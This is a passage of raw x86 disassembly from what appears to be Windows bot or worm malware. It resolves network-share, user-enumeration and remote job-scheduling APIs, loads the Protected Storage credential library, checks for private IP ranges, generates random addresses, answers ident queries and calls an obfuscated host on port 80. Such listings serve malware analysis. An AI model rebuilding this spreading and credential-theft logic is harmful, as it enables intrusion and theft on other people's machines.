mov eax, [ebp+20h]
and eax, 2
test eax, eax
jz short loc_403972
jmp loc_403BB4
; ---------------------------------------------------------------------------
loc_403972: ; CODE XREF: .text:0040396B�j
mov eax, [ebp+20h]
and eax, 4
test eax, eax
jz short loc_4039F4
push 0
push 4
mov eax, [ebp-40Ch]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp-410h], eax
cmp dword ptr [ebp-410h], 0
jnz short loc_4039AA
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039AA: ; CODE XREF: .text:0040399D�j
mov eax, [ebp-410h]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+14h]
jbe short loc_4039D3
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_4039D3: ; CODE XREF: .text:004039BC�j
push 401h
mov eax, [ebp-410h]
push dword ptr [eax]
lea eax, [ebp-404h]
push eax
call sub_407A56
add esp, 0Ch
jmp loc_403ABA
; ---------------------------------------------------------------------------
loc_4039F4: ; CODE XREF: .text:0040397A�j
mov eax, [ebp+20h]
and eax, 1
test eax, eax
jz loc_403A92
mov eax, [ebp-40Ch]
cmp dword ptr [eax+4], 7F000001h
jz short loc_403A1D
mov eax, [ebp-40Ch]
cmp dword ptr [eax+4], 0
jnz short loc_403A92
loc_403A1D: ; CODE XREF: .text:00403A0F�j
push 0
push 4
mov eax, [ebp-40Ch]
add eax, 4
push eax
call ds:dword_417220 ; gethostbyaddr
mov [ebp-410h], eax
cmp dword ptr [ebp-410h], 0
jnz short loc_403A4B
call ds:dword_417224 ; WSAGetLastError
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A4B: ; CODE XREF: .text:00403A3E�j
mov eax, [ebp-410h]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+14h]
jbe short loc_403A74
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403A74: ; CODE XREF: .text:00403A5D�j
push 401h
mov eax, [ebp-410h]
push dword ptr [eax]
lea eax, [ebp-404h]
push eax
call sub_407A56
add esp, 0Ch
jmp short loc_403ABA
; ---------------------------------------------------------------------------
loc_403A92: ; CODE XREF: .text:004039FC�j
; .text:00403A1B�j ...
lea eax, [ebp-404h]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+14h]
jbe short loc_403ABA
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403ABA: ; CODE XREF: .text:0040391D�j
; .text:004039EF�j ...
cmp dword ptr [ebp+18h], 0
jz loc_403B99
push 8
pop eax
test eax, eax
jz short loc_403B2C
push 0Ah
lea eax, [ebp-430h]
push eax
mov eax, [ebp-40Ch]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
lea eax, [ebp-430h]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+1Ch]
jbe short loc_403B19
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp locret_403BB9
; ---------------------------------------------------------------------------
loc_403B19: ; CODE XREF: .text:00403B02�j
lea eax, [ebp-430h]
push eax
push dword ptr [ebp+18h]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403B99
; ---------------------------------------------------------------------------
loc_403B2C: ; CODE XREF: .text:00403AC9�j
mov eax, [ebp+20h]
and eax, 10h
neg eax
sbb eax, eax
and eax, offset aUdp ; "udp"
push eax
mov eax, [ebp-40Ch]
movzx eax, word ptr [eax+2]
push eax
call ds:dword_417228 ; getservbyport
mov [ebp-408h], eax
cmp dword ptr [ebp-408h], 0
jnz short loc_403B61
or eax, 0FFFFFFFFh
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B61: ; CODE XREF: .text:00403B5A�j
mov eax, [ebp-408h]
push dword ptr [eax]
call sub_416B40 ; strlen
pop ecx
inc eax
cmp eax, [ebp+1Ch]
jbe short loc_403B87
push 2747h
call ds:dword_417234 ; WSASetLastError
mov eax, 2747h
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403B87: ; CODE XREF: .text:00403B73�j
mov eax, [ebp-408h]
push dword ptr [eax]
push dword ptr [ebp+18h]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403B99: ; CODE XREF: .text:00403ABE�j
; .text:00403B2A�j
cmp dword ptr [ebp+10h], 0
jz short loc_403BB0
lea eax, [ebp-404h]
push eax
push dword ptr [ebp+10h]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403BB0: ; CODE XREF: .text:00403B9D�j
xor eax, eax
jmp short locret_403BB9
; ---------------------------------------------------------------------------
loc_403BB4: ; CODE XREF: .text:0040396D�j
jmp loc_403A92
; ---------------------------------------------------------------------------
locret_403BB9: ; CODE XREF: .text:004038E8�j
; .text:00403914�j ...
leave
retn 1Ch
; ---------------------------------------------------------------------------
loc_403BBD: ; DATA XREF: sub_403BD3+1C6�o
push ebp
mov ebp, esp
cmp dword ptr [ebp+8], 0
jz short loc_403BCF
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
loc_403BCF: ; CODE XREF: .text:00403BC4�j
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BD3 proc near ; CODE XREF: .text:loc_4168BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_403C00
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push [ebp+var_C]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE40, eax
loc_403C00: ; CODE XREF: sub_403BD3+18�j
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz loc_403CC3
push offset aNetusegetinfo ; "NetUseGetInfo"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE48, eax
push offset aNetuseadd ; "NetUseAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE4C, eax
push offset aNetusedel ; "NetUseDel"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE50, eax
push offset aNetuserenum ; "NetUserEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE54, eax
push offset aNetshareenum ; "NetShareEnum"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE58, eax
push offset aNetremotetod ; "NetRemoteTOD"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE5C, eax
push offset aNetapibufferfr ; "NetApiBufferFree"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE60, eax
push offset aNetschedulejob ; "NetScheduleJobAdd"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE64, eax
push offset aNetaddalternat ; "NetAddAlternateComputerName"
push [ebp+var_14]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE68, eax
loc_403CC3: ; CODE XREF: sub_403BD3+3F�j
push offset aMpr_dll ; "mpr.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_403D23
push offset aWnetaddconnect ; "WNetAddConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE6C, eax
push offset aWnetaddconne_0 ; "WNetAddConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE70, eax
push offset aWnetcancelconn ; "WNetCancelConnection2A"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE74, eax
push offset aWnetcancelco_0 ; "WNetCancelConnection2W"
push [ebp+var_8]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE78, eax
loc_403D23: ; CODE XREF: sub_403BD3+102�j
push offset aWs2_32_dll ; "ws2_32.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_4], eax
push offset aGetaddrinfo ; "getaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE84, eax
push offset aGetnameinfo ; "getnameinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE88, eax
push offset aFreeaddrinfo ; "freeaddrinfo"
push [ebp+var_4]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE8C, eax
cmp dword_41DE84, 0
jz short loc_403D85
cmp dword_41DE88, 0
jz short loc_403D85
cmp dword_41DE8C, 0
jnz short loc_403DA3
loc_403D85: ; CODE XREF: sub_403BD3+19E�j
; sub_403BD3+1A7�j
mov dword_41DE84, offset loc_403588
mov dword_41DE88, offset loc_4038BA
mov dword_41DE8C, offset loc_403BBD
loc_403DA3: ; CODE XREF: sub_403BD3+1B0�j
push offset aPstorec_dll ; "pstorec.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_403DCA
push offset aPstorecreatein ; "PStoreCreateInstance"
push [ebp+var_10]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE80, eax
loc_403DCA: ; CODE XREF: sub_403BD3+1E2�j
push offset aWininet_dll ; "wininet.dll"
call ds:dword_417054 ; LoadLibraryA
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short locret_403DF1
push offset aInternetgetcon ; "InternetGetConnectedStateExA"
push [ebp+var_18]
call ds:dword_417058 ; GetProcAddress
mov dword_41DE7C, eax
locret_403DF1: ; CODE XREF: sub_403BD3+209�j
leave
retn
sub_403BD3 endp
; ---------------------------------------------------------------------------
loc_403DF3: ; DATA XREF: sub_403FE5+89�o
push ebp
mov ebp, esp
mov eax, 1228h
call sub_416BC0
push 1ADh
push dword ptr [ebp+8]
lea eax, [ebp-11B0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp-11ACh]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp-11B4h], eax
cmp dword ptr [ebp-11B4h], 0
jnz short loc_403E52
push dword ptr [ebp-11B0h]
call sub_409763
pop ecx
xor eax, eax
jmp locret_403FE1
; ---------------------------------------------------------------------------
loc_403E52: ; CODE XREF: .text:00403E3D�j
lea eax, [ebp-11ACh]
push eax
mov eax, [ebp-11B0h]
push dword ptr [eax]
push offset dword_4189C4
lea eax, [ebp-11A6h]
push eax
call sub_40D53F
add esp, 10h
loc_403E75: ; CODE XREF: .text:00403EB0�j
; .text:00403F02�j ...
push 3E8h
push dword ptr [ebp-11B4h]
call sub_4048EF
pop ecx
pop ecx
mov [ebp-11B8h], eax
mov eax, [ebp-11B0h]
cmp dword ptr [eax+4], 0
jnz short loc_403EA2
cmp dword ptr [ebp-11B8h], 0
jnz short loc_403EA7
loc_403EA2: ; CODE XREF: .text:00403E97�j
jmp loc_403FC7
; ---------------------------------------------------------------------------
loc_403EA7: ; CODE XREF: .text:00403EA0�j
cmp dword ptr [ebp-11B8h], 0FFFFFFFFh
jnz short loc_403EB2
jmp short loc_403E75
; ---------------------------------------------------------------------------
loc_403EB2: ; CODE XREF: .text:00403EAE�j
push 1000h
lea eax, [ebp-1000h]
push eax
push dword ptr [ebp-11B8h]
call sub_4053DC
add esp, 0Ch
mov [ebp-1228h], eax
cmp dword ptr [ebp-1228h], 0
jz short loc_403EF6
cmp dword ptr [ebp-1228h], 0FFFFFFFFh
jz short loc_403EF6
lea eax, [ebp-1000h]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 10h
jbe short loc_403F07
loc_403EF6: ; CODE XREF: .text:00403ED9�j
; .text:00403EE2�j
push dword ptr [ebp-11B8h]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403F07: ; CODE XREF: .text:00403EF4�j
movsx eax, byte_41EEC8
test eax, eax
jz short loc_403F27
push offset byte_41EEC8
lea eax, [ebp-1224h]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_403F57
; ---------------------------------------------------------------------------
loc_403F27: ; CODE XREF: .text:00403F10�j
lea eax, [ebp-1200h]
push eax
lea eax, [ebp-1224h]
push eax
lea eax, [ebp-11DCh]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp-1224h]
push eax
push offset byte_41EEC8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_403F57: ; CODE XREF: .text:00403F25�j
push offset aUseridUnix ; " : USERID : UNIX : "
lea eax, [ebp-1000h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp-1224h]
push eax
lea eax, [ebp-1000h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset asc_418214 ; "\r\n"
lea eax, [ebp-1000h]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp-1000h]
push eax
call sub_416B40 ; strlen
pop ecx
inc eax
push eax
lea eax, [ebp-1000h]
push eax
push dword ptr [ebp-11B8h]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-11B8h]
call sub_40538D
pop ecx
jmp loc_403E75
; ---------------------------------------------------------------------------
loc_403FC7: ; CODE XREF: .text:loc_403EA2�j
push dword ptr [ebp-11B4h]
call sub_404CBB
pop ecx
push dword ptr [ebp-11B0h]
call sub_409763
pop ecx
xor eax, eax
locret_403FE1: ; CODE XREF: .text:00403E4D�j
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403FE5 proc near ; CODE XREF: sub_40A9CF+EEC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jz short loc_403FFD
push [ebp+arg_4]
call sub_40422A
pop ecx
test eax, eax
jnz short loc_404004
loc_403FFD: ; CODE XREF: sub_403FE5+9�j
mov [ebp+arg_4], offset dword_418A18
loc_404004: ; CODE XREF: sub_403FE5+16�j
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40401A
jmp short locret_40407B
; ---------------------------------------------------------------------------
loc_40401A: ; CODE XREF: sub_403FE5+31�j
push 6
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
cmp [ebp+arg_0], 0
jz short loc_404059
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
test eax, eax
jz short loc_404059
and [ebp+var_8], 0
jmp short loc_404060
; ---------------------------------------------------------------------------
loc_404059: ; CODE XREF: sub_403FE5+5E�j
; sub_403FE5+6C�j
mov [ebp+var_8], 1
loc_404060: ; CODE XREF: sub_403FE5+72�j
push [ebp+arg_4]
push offset dword_4189F8
push [ebp+var_8]
push [ebp+var_4]
push offset loc_403DF3
call sub_4095A4
add esp, 14h
locret_40407B: ; CODE XREF: sub_403FE5+33�j
leave
retn
sub_403FE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40407D proc near ; CODE XREF: .text:00405D57�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
loc_404085: ; CODE XREF: sub_40407D+2C�j
cmp [ebp+arg_4], 1
jbe short loc_4040AB
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+arg_0]
inc eax
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
dec eax
mov [ebp+arg_4], eax
jmp short loc_404085
; ---------------------------------------------------------------------------
loc_4040AB: ; CODE XREF: sub_40407D+C�j
cmp [ebp+arg_4], 0
jz short loc_4040BF
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
loc_4040BF: ; CODE XREF: sub_40407D+32�j
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
add eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 10h
mov ecx, [ebp+var_4]
add ecx, eax
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
not eax
leave
retn
sub_40407D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040E8 proc near ; CODE XREF: .text:00405D37�p
; sub_40A9CF+1A2F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jz short loc_404146
cmp [ebp+var_4], 3
jz short loc_404124
cmp [ebp+var_4], 4
jz short loc_404106
jmp short loc_40416A
; ---------------------------------------------------------------------------
loc_404106: ; CODE XREF: sub_4040E8+1A�j
mov eax, [ebp+arg_0]
and al, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404124: ; CODE XREF: sub_4040E8+14�j
mov eax, [ebp+arg_0]
and ah, 0
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 8
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_404146: ; CODE XREF: sub_4040E8+E�j
mov eax, [ebp+arg_0]
and eax, 0FF00FFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 10h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
loc_40416A: ; CODE XREF: sub_4040E8+1C�j
mov eax, [ebp+arg_0]
and eax, 0FFFFFFh
mov [ebp+arg_0], eax
push 0FEh
push 1
call sub_4103F5
pop ecx
pop ecx
shl eax, 18h
mov ecx, [ebp+arg_0]
or ecx, eax
mov [ebp+arg_0], ecx
mov eax, [ebp+arg_0]
leave
retn
sub_4040E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404193 proc near ; CODE XREF: sub_404279+A�p
; sub_40435B+17�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0Ah
push [ebp+arg_0]
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
pop ebp
retn
sub_404193 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041B7 proc near ; CODE XREF: sub_40D871+5B3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push offset a127_ ; "127."
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041D5
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041D5: ; CODE XREF: sub_4041B7+17�j
push 4
push offset a172_ ; "172."
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_4041F0
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_4041F0: ; CODE XREF: sub_4041B7+32�j
push 8
push offset a192_168_ ; "192.168."
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_40420B
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_40420B: ; CODE XREF: sub_4041B7+4D�j
push 3
push offset a10_ ; "10."
push [ebp+arg_0]
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jnz short loc_404226
push 1
pop eax
jmp short loc_404228
; ---------------------------------------------------------------------------
loc_404226: ; CODE XREF: sub_4041B7+68�j
xor eax, eax
loc_404228: ; CODE XREF: sub_4041B7+1C�j
; sub_4041B7+37�j ...
pop ebp
retn
sub_4041B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40422A proc near ; CODE XREF: .text:00402C38�p
; sub_403FE5+E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_40423C
; ---------------------------------------------------------------------------
loc_404235: ; CODE XREF: sub_40422A:loc_404273�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40423C: ; CODE XREF: sub_40422A+9�j
cmp [ebp+var_4], 6
jnz short loc_404244
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_404244: ; CODE XREF: sub_40422A+16�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_404273
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40426C
cmp [ebp+var_8], 0FFFFh
jbe short loc_40426E
loc_40426C: ; CODE XREF: sub_40422A+37�j
jmp short loc_404275
; ---------------------------------------------------------------------------
loc_40426E: ; CODE XREF: sub_40422A+40�j
push 1
pop eax
jmp short locret_404277
; ---------------------------------------------------------------------------
loc_404273: ; CODE XREF: sub_40422A+25�j
jmp short loc_404235
; ---------------------------------------------------------------------------
loc_404275: ; CODE XREF: sub_40422A+18�j
; sub_40422A:loc_40426C�j
xor eax, eax
locret_404277: ; CODE XREF: sub_40422A+47�j
leave
retn
sub_40422A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404279 proc near ; CODE XREF: sub_4042FB+C�p
; .text:00408CC7�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41EF48
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; .text:00413696�p ...
push ebp
mov ebp, esp
cmp dword_41E294, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E298
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E294
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, dword_41E298
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call ds:dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: .text:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset a1 ; "::1"
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: .text:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset aXsUlsbNP ; "•‘Àž«˜¡Ð¾°¶"
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: .text:0040755B�p
; .text:004075C3�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call ds:dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; .text:00411E2A�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call ds:dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DE88 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
